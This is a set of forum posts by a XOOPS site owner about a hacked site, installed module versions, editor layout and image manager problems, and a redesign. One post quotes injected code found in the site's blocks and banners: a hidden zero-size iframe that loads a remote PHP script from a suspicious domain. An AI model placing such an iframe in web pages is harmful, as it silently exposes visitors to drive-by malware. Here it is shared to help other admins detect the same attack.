No problem - I understand (and I'm pretty sure anyone capable of using that info can figure it out more quickly than I did...)

Thanks for the advice guys - I dumped TinyEvent and will be upgrading Protector ASAP. If anyone can describe vulnerabilites with xcGallery, it would be appreciated as well..

Sorry - you might not be malicious but someone who reads it might be.

We've had a lot of trouble with this site being hacked - wouldn't want to encourage them to have a go at us, eh?[/edit]

Sure - here's what I've got installed:

XOOPS 2.0.18.1
ForumEX 1.4
News 1.53
XCGallery 2.03
Tiny Event 1.01
Mastop Go2 1.00
Smartsection 2.13
AM Contact .05
Xoops Protector 2.56
RSS Fit 1.1

If anyone can give me hints to secure my site, it'd be greatly appreciated. I did find out the attacks were originating in the Ukraine, so I added an .htaccess file in my main directory to block all IP's originating in the Ukraine, and Turkey to boot (I had some previous issues with hackers in Turkey).

My Xoops-based site was recently hacked - it took me a minute to figure out what had happened, but just in case you run across it...

Opening my site I noticed a warning - something about:

""remote data services data control", and prompting me to allow it.

Well F**K that - after poking around I found this code appended to a number of my blocks and banner ads:

<iframe src="http://uokill.zh.od.ua/out.,php" width="0" height="0"

frameborder="0"></iframe></div>

Which would run a remote .php script ("out.php"). Took a few minutes to edit out all the malicious code, but if you have a similar problem, hopefully this will help you out.

Newbbex problem - editor overlaps right-hand tables

I hope someone can figure this out - it seems to me there ought to be a simple solution, but for the life of me I can't figure it out.

I recently upgraded to 2.0.18 and re-did the design of my site. I am using Newbbex 1.4 for my message boards and a fixed-width theme. The forums look fine when reading messages, but when you post a new topic, the editor is too wide for the frames and overlaps the right side (see image link). Is there a way to modify the editor so that it doesn't do this, or to prevent it? The image is a bit small, but the blue area is the selected text so you can see how far it overlaps. It's more of a nuisance than anything, but I'd love to fix it.

Thanks in advance.

Thanks, Bassman - I will give your comments some consideration. We've still got some content to add; when I'm a little farther along I'll give some thought to how to add a little flair to the site.

Thanks!

Hiya everybody. I just re-launched a newly designed version of my site Yellow-Menace.com, an Asian Pop Culture site. We've been using XOOPS for about 2 years now and really dig it. For the new design I modified the recently re-released ExNews theme with an eye towards useability and streamlined design (some users complained that the last version was too busy - and they were probably right!)

At any rate, have a look and let me know what you think!

Spotlight + AMS 2.41 - 'Specify Image'...where do I put pictures?

I am running XOOPS 2.0.16 with AMS 2.41 for my article management. When I create a spotlight block on my Top Page, I'd like to use a custom picture (not Topic or Author Avatar) but when I click on the 'MANAGER' button in the 'Image' field, all I get is a popup with a blank dropdown. I assume I'm supposed to put these pictures on my server somwhere, but in what folder do I place them?

Thanks...

Yes, the images are there...I can access the modules just fine and the paths are correct. I have also refreshed the admin page and updated the system module numerous times, but it doesn't seem to work.

To be honest, it's more of a nuisance than a critical problem. Everything works, it just makes it a pain in the butt.

Anyone know what's going on with this? I can't see some of the images in my Admin menu. I can still click on the 'buttons' that are supposed to be there, so the image areas are still linked, but the image just doesn't show up.

I've been trying to figure it out for weeks and it's making my brain hurt. Any suggestions?
